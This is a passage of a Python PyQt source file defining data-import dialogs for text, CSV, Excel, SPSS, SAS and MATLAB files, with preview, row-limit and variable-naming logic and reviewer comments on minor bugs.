        (4) name collisions with existing workspace variables (prompt the
            user to resolve them)
        Hence this step is kept as a separate method.
        """
        # Start from the current "dataset name" / "sheet" name.
        self.newdatasetname = {"varname": {}}
        e = self.import_param["datasetname"]
        while True:
            var_name, ok = QInputDialog.getText(self, "变量名", "输入新的变量名称:", QLineEdit.Normal, e)
            if ok:
                if len(var_name) == 0:
                    QMessageBox.warning(self, "提示", "请输入变量名称!")
                    continue
                elif self.extension_lib.Data.var_exists(var_name):
                    # Name collision: let the user decide whether to overwrite.
                    isCover = QMessageBox().question(None, "提示", "变量 {} 已经存在,是否覆盖?".format(var_name),
                                                     QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
                    if isCover == QMessageBox.Yes:
                        break
                    else:
                        continue
                elif not var_name.isidentifier():
                    QMessageBox.warning(self, '提示', '变量名无效\n提示:\n1、不要以数字开头;\n2、不要包含除下划线外的所有符号。')
                else:
                    break
            else:
                # Dialog cancelled: fall back to preview mode.
                ok = False
                self.import_param.update(ispreview=True, status=True)
                break
        if ok:
            self.newdatasetname["varname"][e] = var_name
            # if self.import_param["ismerge"]:
            #     self.newdatasetname["datasetname"] = var_name
            #     self.import_param["datasetname"] = var_name
            # else:
            #     self.newdatasetname["varname"][e] = var_name
            #     self.import_param["varname"][e] = var_name
        return (ok)
    def sendDataset(self):
        """
        Source-agnostic (SAS / SPSS / Excel / ...): pushes the loaded pandas
        data into the application workspace.
        """
        if self.import_param["status"]:
            # if self.import_param["ismerge"]:
            #     set_var(self.newdatasetname["datasetname"], self.current_dataset)
            # else:
            for name_i, var_i in self.newdatasetname["varname"].items():
                set_var(var_i, self.current_dataset[name_i])  # publish into the workspace
            QMessageBox.information(self, "{}导入结果".format(""), "数据导入完成!", QMessageBox.Yes)
            self.close()
    def clearImportParam(self):
        """Reset the dataset and all import state to defaults."""
        self.current_dataset = {}
        self.import_message = {"isError": False, "warningMessage": []}
        self.import_param = {
            "datasetname": "",  # dataset name
            "varname": {},  # imported variable names (dict); holds renamed results later
            "filepath": "",  # file path
            "hasheader": True,  # whether the first row holds column names
            "dtypes": {},  # per-column dtypes (dict); holds user changes later
            "status": False,  # import result: True = success, False = failure
            "param": {},  # parameters collected from the import panel (dict)
            "ispreview": True,  # preview mode flag
            "ismerge": False  # merge multi-variable datasets into one dict on import
        }
    def get_work_dir(self) -> str:
        """Return the working directory from the host program."""
        return self.extension_lib.Program.get_work_dir()
    def center(self):
        """Center the dialog on the screen."""
        qr = self.frameGeometry()
        cp = QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())
    def keyPressEvent(self, e):
        """Close the dialog (after confirmation) when Escape is pressed."""
        if e.key() == Qt.Key_Escape:
            button = QMessageBox.question(self, "Question", "是否退出当前窗口?",
                                          QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)
            if button == QMessageBox.Ok:
                self.close()
    def showWarningMessage(self, info=""):
        """Show a warning box; defaults to the first queued warning message."""
        info = info if info else self.import_message["warningMessage"][0]
        if info:
            QMessageBox.warning(self, '警告:', info)
            logging.info("获取数据警告:\n" + info)
    def updateWarningMessage(self, info="", new=True):
        """Queue a warning (new=True) or clear all warnings (new=False)."""
        if new:
            self.import_message["isError"] = True
            self.import_message["warningMessage"].append(info)
        else:
            self.import_message["isError"] = False
            self.import_message["warningMessage"] = []
    def checkFilePath(self, path):
        '''Validate the entered file path (existence and extension).'''
        if path:
            if not os.path.exists(path):
                self.updateWarningMessage(info="数据集路径不存在,\n请重新输入数据集路径!")
            # NOTE(review): this is a substring test against e.g. "*.csv *.txt";
            # it works for the expected extensions but is not an exact match.
            if os.path.split(path)[-1].split(".")[-1].lower() not in self.file_types:
                self.updateWarningMessage(
                    info="数据文件格式有错:\n仅支持({})类型文件,\n请重新输入数据集路径!".format(self.file_types)
                )
        return (path)
    def checkRowsNumber(self, rows, types):
        '''Validate that a row count is a non-negative integer or "全部" (all).'''
        typesDict = {
            "limitRows": "“限定行数”必须是大于等于0的整数或“全部”",
            "skipRows": "“跳过行数”必须是大于等于0的整数"
        }
        if rows == "全部":
            row_number = None
        elif rows.isdigit():
            row_number = int(rows)
        else:
            row_number = 0
            self.updateWarningMessage(info="{}\n请重新输入!".format(typesDict[types]))
        if self.import_param["ispreview"] and types == "limitRows":
            # In preview mode, cap the row limit at 100.
            row_number = min([100, row_number if row_number else 101])
        return (row_number)
    def headerAsColumns(self, data):
        """Demote the header row back into the data (first row is NOT column names)."""
        colnames = pd.DataFrame([data.columns], index=[0], columns=data.columns.tolist())
        data.index += 1
        # NOTE(review): DataFrame.append was removed in pandas 2.0 — use
        # pd.concat([colnames, data]) when upgrading.
        data = data.append(colnames, ignore_index=False)
        data.sort_index(inplace=True)
        data.columns = ["C" + str(i + 1) for i in range(data.shape[1])]
        return (data)
    def datasetUpdate(self, data, skiprow, limitrow):
        """Apply skip/limit row settings to the dataset."""
        data = data[data.index >= skiprow] # skip the first `skiprow` rows
        if limitrow:
            limitrows = min(data.shape[0], limitrow)
            data = data.head(limitrows)
        return (data)
    def showDatasetPreview(self, data, header=True):
        """Render (up to 100 rows of) the imported dataset in the preview table."""
        if not header:
            # First row is data, not column names — demote the header.
            data = self.headerAsColumns(data)
        table_rows, table_colunms = data.head(100).shape
        table_header = [str(col_i) for col_i in data.columns.tolist()]
        self.tableWidget_previewData.setColumnCount(table_colunms)
        self.tableWidget_previewData.setRowCount(table_rows)
        self.tableWidget_previewData.setHorizontalHeaderLabels(table_header)
        # Fill the preview grid cell by cell.
        for i in range(table_rows):
            row_values = data.iloc[i].tolist()
            for j, element in enumerate(row_values):
                newItem = QTableWidgetItem(str(element))
                newItem.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
                self.tableWidget_previewData.setItem(i, j, newItem)
    def updateDatasetNameLine(self, tag):
        """Update the dataset-name line edit from the selected sheet tag."""
        new_datasetname = self.import_param["datasetname"] if tag == "(全部导入)" else tag
        self.lineEdit_datasetName.setText(new_datasetname)
    def clearPreviewDataTableWidget(self):
        """Clear the preview table widget."""
        self.tableWidget_previewData.clear()
        self.showDatasetPreview(data=pd.DataFrame([]))
    def showHelp(self):
        # Lazy import to avoid a hard dependency at module load time.
        from packages.pm_helpLinkEngine import helpLinkEngine as h
        h.helpLink.openHelp("dataio_sample_showhelp")
    # --- database-related helpers ---
    def checkTextNotNull(self, dicts):
        """Warn about every empty connection field in *dicts*."""
        db_dict = {"host": "IP地址", "user": "用户名称", "passwd": "密码", "db": "数据库名称", "password": "密码",
                   "port": "IP端口", "charset": "数据类型", "table": "表格名称", "schema": "数据模式", "database": "数据库名称",
                   "server_name": "服务名称"}
        for k, v in dicts.items():
            if not v:
                self.updateWarningMessage(info="‘{tag}’不能为空,请重新输入!".format(tag=db_dict[k]))
    def updateDatabaseConnectStatusLabel(self, e=""):
        """Show connection status: success (blue) or failure *e* (red)."""
        tag = {"label": "连接成功", "color": "color: blue;"}
        if e:
            tag.update(label='连接失败:' + e, color="color: rgb(255, 0, 0);")
        self.label_test.setHidden(False)
        self.label_test.setText(tag["label"])
        self.label_test.setStyleSheet(tag["color"])
    def dbConnectTestButton(self):
        """Check whether the database connection settings are valid."""
        self.import_param.update(ispreview=True)
        self.getImportParam()
        if self.import_message["isError"]:
            self.showWarningMessage()
            return
        error = self.importDatasetLoad()
        self.updateDatabaseConnectStatusLabel(error)
    def dbDatasetImportButton(self):
        """Handler for the database "import" button."""
        self.import_param.update(ispreview=False)
        self.getImportParam()
        if self.import_message["isError"]:
            self.showWarningMessage()
            return
        var_name_check = self.updateDatasetVarname()
        if var_name_check:
            import sys
            t0 = time.time()
            error = self.importDatasetLoad()
            self.updateDatabaseConnectStatusLabel(error)
            self.sendDataset()
            t1 = time.time()
            logger.info("导入数据集所用时间: {t} s 大小 {m} MB".format(
                t=round(t1 - t0, 2), m=round(sys.getsizeof(self.current_dataset) / 1024, 2)
            ))
            self.current_dataset = None
    def getCurFetchData(self, cur):
        """Execute the stored SQL on cursor *cur* and return the result as a DataFrame."""
        temp = pd.DataFrame([])
        try:
            cur.execute(self.import_param["sql"])
            if cur.description:
                temp = pd.DataFrame(data=list(cur.fetchall()),
                                    columns=list(map(lambda x: x[0], cur.description)))
        except Exception as e:
            # NOTE(review): "{}" is concatenated, not formatted — the literal
            # braces end up in the message; probably meant .format(str(e)).
            self.updateWarningMessage("导入失败,错误详情:\n{}" + str(e))
        return (temp)
    def updateChooseTagName(self, comboBox, tagname=[]):
        """Populate *comboBox* with the imported variable (sheet) names."""
        # NOTE(review): tagname=[] is a mutable default; harmless here because
        # it is only reassigned, never mutated — but a None default is safer.
        comboBox.clear()
        if not self.import_param["status"]:
            return
        if not tagname:
            tagname = list(self.current_dataset)
        # With multiple sheets, prepend the "import everything" entry.
        tagname = ["(全部导入)"] + tagname if len(tagname) > 1 else tagname
        for v in tagname:
            # Refresh the "data location" list of the Excel import panel.
            comboBox.addItem(v)
# 优化完成
class ImportTextForm(ImportDialog, dataImportFormEngine):
    """
    "Import Text" window, providing:
    (1) getImportParam:       collect the configuration from the panel
    (2) importDatasetReload:  (re)load the file contents
    (3) updateTableView:      refresh the preview view
    """
    def __init__(self, parent=None):
        self.file_types = "*.csv *.txt *.tsv"
        self.IconPath = ":/resources/icons/txt.svg"
        super().__init__(parent)
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()
    def AddUIFormActivity(self):
        """Wire up the panel's interactive widgets."""
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # first row is header
        self.checkBox_asString.stateChanged.connect(self.previewButton)  # import as raw text
        self.comboBox_encode.currentTextChanged.connect(self.previewButton)  # encoding choice
        self.comboBox_separator.currentTextChanged.connect(self.previewButton)  # separator choice
    def updateUIForm(self):
        """Lay out the ImportTextForm configuration widgets."""
        separator_char = ["\\n"] + self.separator_char
        self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
        self.comboBox_separator = self.updateForm_ComboBox(self.comboBox_separator, separator_char)
        self.horizontalLayoutAddUI(self.checkBox_asString)
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "left")
        self.verticalLayoutAddUI(self.comboBox_separator, "right")
        self.verticalLayoutAddUI(self.comboBox_encode, "right")
        self.publicUIFormActivity()
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the configuration from the panel:
        (1) header row flag (2) dataset name (3) rows to skip
        (4) row limit (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={},
            asString=self.checkBox_asString.isChecked(),
            param={
                "filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
                "engine": "python",
                "header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
                "sep": self.comboBox_separator.currentText(),
                "encoding": self.comboBox_encode.currentText(),
                "nrows": self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
                "skiprows": self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows")
            }
        )
    def importDatasetReload(self):
        """
        Re-read the data from disk using the current panel parameters
        (either as one raw string or via pandas.read_table).
        """
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        if self.import_param["asString"]:
            with open(file=param["filepath_or_buffer"], encoding=param["encoding"]) as f:
                size = param["nrows"] if param["nrows"] else -1
                temp = f.read(size)
                # NOTE(review): f.close() is redundant inside a `with` block.
                f.close()
        else:
            temp = pd.read_table(**param)
        # Text import handles one file at a time, so the dataset name is
        # used directly as the variable name.
        self.current_dataset[varname] = temp
        self.getDatasetInfo()
        self.import_param.update(status=True)
    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to display.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        dataset = self.current_dataset[self.import_param["datasetname"]]
        if self.checkBox_asString.isChecked():
            # Raw-text mode: show the first 100 characters in a single cell.
            preview_data = pd.DataFrame({"文本": [dataset[:100]]})
            header = True
        else:
            preview_data = dataset.head(100)
            header = self.checkBox_ifColumns.isChecked()
        self.showDatasetPreview(data=preview_data, header=header)
# 优化完成
class ImportCsvForm(ImportDialog, dataImportFormEngine):
    """The "Import CSV" window."""
    def __init__(self, parent=None):
        self.IconPath = ":/resources/icons/csv.svg"
        self.file_types = "*.csv"
        super().__init__(parent)
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()
    def AddUIFormActivity(self):
        """Wire up the panel's interactive widgets."""
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # first row is header
        self.checkBox_ifColIndex.stateChanged.connect(self.previewButton)  # first column is index
        self.comboBox_encode.currentTextChanged.connect(self.previewButton)  # encoding choice
        self.comboBox_separator.currentTextChanged.connect(self.previewButton)  # separator choice
    def updateUIForm(self):
        """Lay out the ImportCsvForm configuration widgets."""
        self.comboBox_separator = self.updateForm_ComboBox(self.comboBox_separator, self.separator_char)
        self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)
        self.horizontalLayoutAddUI(self.checkBox_ifColIndex)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "left")
        self.verticalLayoutAddUI(self.comboBox_separator, "right")
        self.verticalLayoutAddUI(self.comboBox_encode, "right")
        self.publicUIFormActivity()
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the configuration from the panel:
        (1) header row flag (2) dataset name (3) rows to skip
        (4) row limit (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={},
            param={
                "filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
                "engine": "c",
                "header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
                "sep": self.comboBox_separator.currentText(),
                "index_col": 0 if self.checkBox_ifColIndex.isChecked() else None,
                "encoding": self.comboBox_encode.currentText(),
                "nrows": self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
                "skiprows": self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows")
            }
        )
    def importDatasetReload(self):
        """
        Re-read the CSV file using the current panel parameters.
        """
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        # CSV import handles one file at a time, so the dataset name is used
        # directly as the variable name.
        self.current_dataset[varname] = pd.read_csv(**param)
        # Echo the equivalent command into the host's command runner.
        run_command("", "pd.read_csv(%s)" % kwargs_to_str(param))
        self.getDatasetInfo()
        self.import_param.update(status=True)
    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to display.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        dataset = self.current_dataset[self.import_param["datasetname"]]
        if self.comboBox_separator.currentText() == "(无)":
            # No separator selected: show the raw text in a single cell.
            preview_data = pd.DataFrame({"文本": [dataset[:100]]})
            header = True
        else:
            preview_data = dataset.head(100)
            header = self.checkBox_ifColumns.isChecked()
        self.showDatasetPreview(data=preview_data, header=header)
# 后续还需要进一步优化方案
class ImportExcelForm(ImportDialog, dataImportFormEngine):
    """Excel (.xls / .xlsx) import dialog."""
    def __init__(self, parent=None):
        super().__init__(parent)
        self.IconPath = ":/resources/icons/excel.svg"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        # Last successfully loaded path; the workbook is re-read only when
        # this changes (see getImportParam / importDatasetReload).
        self.new_import_filepath = ""
        self.file_types = "*.xls *.xlsx"
        self.sheetsname = []
        self.updateUIForm()
    def AddUIFormActivity(self):
        """Wire up the dialog's event handlers."""
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # toggle: first row is the header
        self.checkBox_ifColIndex.stateChanged.connect(self.previewButton)  # toggle: first column is the index
        self.comboBox_sheetname.currentTextChanged.connect(self.updateTableView)  # switch sheet
    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)  # first row is header
        self.horizontalLayoutAddUI(self.checkBox_ifColIndex)  # first column is index
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")  # dataset name
        self.verticalLayoutAddUI(self.comboBox_sheetname, "right")  # sheet name
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")  # row limit
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")  # rows to skip
        self.publicUIFormActivity()
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the Excel import configuration from the UI.
        (1) header-row flag (2) dataset name (3) rows to skip (4) row limit
        (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        # Excel files are always fully loaded and then sliced in memory,
        # so ispreview is effectively always False here.
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={}, loaddataset=False, ismerge=True,
            limitrows=self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
            skiprows=self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows"),
            # NOTE(review): pandas.read_excel documents `header` as an int or
            # list of ints (default 0); 'infer' is a read_csv value — confirm.
            # `engine` here is overwritten in LoadSheetname before any read.
            param={
                "io": self.checkFilePath(self.lineEdit_filePath.text()),
                "engine": "python",
                "sheet_name": "",
                "header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
                "nrows": None,  # load everything by default; slice in memory
                "index_col": 0 if self.checkBox_ifColIndex.isChecked() else None,
                "skiprows": 0
            }
        )
        if self.import_message["isError"]:
            return
        if self.new_import_filepath != self.import_param["filepath"]:
            # Reload only when the file path changed; otherwise keep showing
            # the datasets already held in memory.
            self.import_param.update(loaddataset=True)
            self.LoadSheetname()
    def LoadSheetname(self):
        """Pre-load the workbook's sheet names into the sheet combo box."""
        # True only for ".xls" files ("xlsx" does not end with "xls").
        ftype = os.path.split(self.import_param["filepath"])[1].endswith("xls")
        # Fetch every sheet of the workbook and populate the sheet names.
        if ftype:
            # xls format
            wb = xlrd.open_workbook(self.import_param["filepath"])
            self.sheetsname = wb.sheet_names()
        else:
            # xlsx format
            wb = openpyxl.load_workbook(self.import_param["filepath"], read_only=True)
            self.sheetsname = wb.sheetnames
        # Choose the pandas engine matching the file format.
        self.import_param["param"].update(engine='xlrd' if ftype else 'openpyxl')
        # With several sheets the user may import them all at once, signalled
        # by the extra "(全部导入)" ("import all") entry.
        # self.updateChooseTagName(self.comboBox_sheetname, tagname = self.sheetsname)
        self.comboBox_sheetname.clear()
        tagname = ["(全部导入)"] + self.sheetsname if len(self.sheetsname) > 1 else self.sheetsname
        for v in tagname:
            # Refresh the "data location" list of the Excel import dialog.
            self.comboBox_sheetname.addItem(v)
    def importDatasetReload(self):
        """
        Reload the imported data.
        """
        if self.import_param["loaddataset"]:
            param = self.import_param["param"]
            self.current_dataset = {}
            for sheet_i in self.sheetsname:
                # Always load the full sheet; slicing happens afterwards.
                param.update(sheet_name=sheet_i)
                self.current_dataset[sheet_i] = pd.read_excel(**param)
                run_command("", "pd.read_excel(%s)" % kwargs_to_str(param))
        if not self.import_param["ispreview"]:
            sheet_ind = self.comboBox_sheetname.currentText()
            if sheet_ind != "(全部导入)":
                # A single sheet was chosen: keep only that sheet.
                self.import_param.update(ismerge=False)
                self.current_dataset = {sheet_ind: self.current_dataset[sheet_ind]}
            for name_i, temp in self.current_dataset.items():
                if not self.import_param["hasheader"]:
                    temp = self.headerAsColumns(temp)
                self.current_dataset[name_i] = self.datasetUpdate(
                    data=temp, limitrow=self.import_param["limitrows"], skiprow=self.import_param["skiprows"]
                )
        self.new_import_filepath = self.import_param["filepath"]
        self.getDatasetInfo()
        self.import_param.update(status=True, loaddataset=False)
    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to display.
        self.clearPreviewDataTableWidget()
        self.updateDatasetNameLine(tag=self.comboBox_sheetname.currentText())
        if not self.import_param["status"]:
            self.showDatasetPreview(data=pd.DataFrame([]))
            return
        # Is the first row the header?
        header = self.checkBox_ifColumns.isChecked()
        # Currently selected sheet.
        load_sheet = self.comboBox_sheetname.currentText()
        l = self.import_param["limitrows"]
        s = self.import_param["skiprows"]
        if load_sheet == "(全部导入)":
            # "Import all": show one summary row per sheet instead of data.
            temp = []
            for name_i, data_i in self.current_dataset.items():
                if not header:
                    data_i = self.headerAsColumns(data_i)
                data_i = self.datasetUpdate(data_i, limitrow=l, skiprow=s)
                row_i, col_i = data_i.shape
                temp.append([name_i, row_i, col_i, data_i.columns.tolist()])
            header = True  # avoid rendering glitches in the preview matrix
            preview_data = pd.DataFrame(temp, columns=["表名称", "行数", "列数", "列名称"])
        else:
            preview_data = self.datasetUpdate(self.current_dataset[load_sheet], limitrow=l, skiprow=s)
        self.showDatasetPreview(data=preview_data, header=header)
# 优化完成
class ImportSpssForm(ImportDialog, dataImportFormEngine):
    """
    SPSS (.sav) import dialog.
    """
    def __init__(self, parent=None):
        super().__init__(parent)
        self.file_types = "*.sav"
        self.IconPath = ":/resources/icons/spss.svg"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()
    def AddUIFormActivity(self):
        """Wire up the dialog's event handlers."""
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # toggle: first row is the header
        self.comboBox_encode.currentIndexChanged.connect(self.previewButton)  # encoding selection
    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        self.encode_type = ["gbk", "utf8", "gb2312", "ascii"]
        self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.comboBox_encode, "right")
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")
        self.publicUIFormActivity()
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the import configuration from the UI.
        (1) header-row flag (2) dataset name (3) rows to skip (4) row limit
        (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        # NOTE(review): limitrows/skiprows are collected but not applied in
        # importDatasetReload below — confirm whether slicing was intended.
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={},
            limitrows=self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
            skiprows=self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows"),
            # Keyword arguments forwarded verbatim to pyreadstat.read_sav.
            param={
                "filename_path": self.checkFilePath(self.lineEdit_filePath.text()),
                "encoding": self.comboBox_encode.currentText()
            }
        )
    def importDatasetReload(self):
        """
        Reload the imported data.
        """
        import pyreadstat
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        # read_sav returns (DataFrame, metadata); the metadata is discarded.
        self.current_dataset[varname], meta = pyreadstat.read_sav(**param)
        # SPSS imports one file at a time, so the variable name defaults to
        # the dataset name.
        self.getDatasetInfo()
        self.import_param.update(status=True)
    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to display.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        name = self.import_param["datasetname"]
        self.showDatasetPreview(data=self.current_dataset[name], header=True)
# 优化完成
class ImportSasForm(ImportDialog, dataImportFormEngine):
    """SAS (.sas7bdat) import dialog."""
    def __init__(self, parent=None):
        super().__init__(parent)
        self.file_types = "*.sas7bdat"
        self.IconPath = ":/resources/icons/sas.ico"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()
    def AddUIFormActivity(self):
        # Event wiring for the import dialog.
        # Open the file chooser from the import dialog.
        self.pushButton_choosefile.clicked.connect(self.chooseFileButton)
        # Help button.
        self.pushButton_help.clicked.connect(self.showHelp)
        # Configuration changes that refresh the data.
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # toggle: first row is the header
        self.comboBox_encode.currentIndexChanged.connect(self.previewButton)  # encoding selection
        # Buttons that refresh the data.
        self.pushButton_preview.clicked.connect(self.previewButton)  # preview
        self.pushButton_ok.clicked.connect(self.importDatasetButton)  # import
        self.pushButton_cancel.clicked.connect(self.close)  # cancel
    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        # NOTE(review): self.encode_type is not defined in this class (unlike
        # ImportSpssForm); it must be provided by a base class, otherwise this
        # line raises AttributeError — confirm.
        self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.comboBox_encode, "right")
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the import configuration from the UI.
        (1) header-row flag (2) dataset name (3) rows to skip (4) row limit
        (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={},
            # Keyword arguments forwarded verbatim to pandas.read_sas.
            param={
                "filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
                "format": "sas7bdat",
                "encoding": self.comboBox_encode.currentText()
            }
        )
    def importDatasetReload(self):
        """
        Reload the imported data.
        """
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        self.current_dataset[varname] = pd.read_sas(**param)
        # SAS imports one file at a time, so the variable name defaults to
        # the dataset name.
        self.getDatasetInfo()
        self.import_param.update(status=True)
    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to display.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        name = self.import_param["datasetname"]
        self.showDatasetPreview(data=self.current_dataset[name], header=True)
# 优化完成
class ImportMatlabForm(ImportDialog, dataImportFormEngine):
    """MATLAB (.mat) import dialog."""
    def __init__(self, parent=None):
        super().__init__(parent)
        # Last successfully loaded path; the file is re-read only when this
        # changes.
        self.new_import_filepath = ""
        self.file_types = "*.mat"
        self.IconPath = ":/resources/icons/matlab.svg"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()
    def AddUIFormActivity(self):
        """Wire up the dialog's event handlers."""
        self.checkBox_asDataFrame.stateChanged.connect(self.updateTableView)  # expose arrays as DataFrames
        self.comboBox_varname.currentTextChanged.connect(self.updateTableView)
    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        self.horizontalLayoutAddUI(self.checkBox_asDataFrame)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.comboBox_varname, "right")
        self.publicUIFormActivity()
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the import configuration from the UI.
        (1) header-row flag (2) dataset name (3) rows to skip (4) row limit
        (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(), loaddataset=False,
            status=False, varname={}, dtypes={}, ismerge=True,
            asdataframe=self.checkBox_asDataFrame.isChecked(),
            # Keyword arguments forwarded verbatim to scipy.io.loadmat.
            param={
                "file_name": self.checkFilePath(self.lineEdit_filePath.text())
            }
        )
        if self.import_message["isError"]:
            return
        if self.new_import_filepath != self.import_param["filepath"]:
            # Reload only when the file path changed; otherwise keep using
            # the variables already held in memory.
            self.import_param.update(loaddataset=True)
    def importDatasetReload(self):
        """
        Reload the imported data.
        """
        if self.import_param["loaddataset"]:
            import scipy.io as sio
            param = self.import_param["param"]
            self.current_dataset = {}
            mat_dataset = sio.loadmat(**param)
            self.new_import_filepath = self.import_param["filepath"]
            for name_i, var_i in mat_dataset.items():
                if type(var_i) == np.ndarray and name_i[:2] != "__":
                    # Keep array-valued entries only (skip loadmat's "__"
                    # bookkeeping keys).
                    # Some non-matrix data is also stored as ndarray, so the
                    # exact type is compared against np.ndarray to single out
                    # the genuine array variables.
                    # Note: scipy.io.loadmat currently cannot parse MATLAB
                    # "table" typed data!
                    # Arrays may later be exposed as DataFrame or ndarray.
                    self.current_dataset[name_i] = var_i
            self.import_param.update(status=True, loaddataset=False)
            self.updateChooseTagName(self.comboBox_varname)
        if not self.import_param["ispreview"]:
            for name_i, var_i in self.current_dataset.items():
                # Optionally wrap 1-D/2-D arrays in a DataFrame.
                self.current_dataset[name_i] = pd.DataFrame(var_i) if self.import_param["asdataframe"] and len(
                    var_i.shape) <= 2 else var_i
            varname = self.comboBox_varname.currentText()
            if varname != "(全部导入)":
                # A single variable was chosen: keep only that variable.
                self.import_param.update(ismerge=False)
                self.current_dataset = {varname: self.current_dataset[varname]}
        self.getDatasetInfo()  # refresh the current dataset's info
    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to display.
        varname = self.comboBox_varname.currentText()
        self.clearPreviewDataTableWidget()
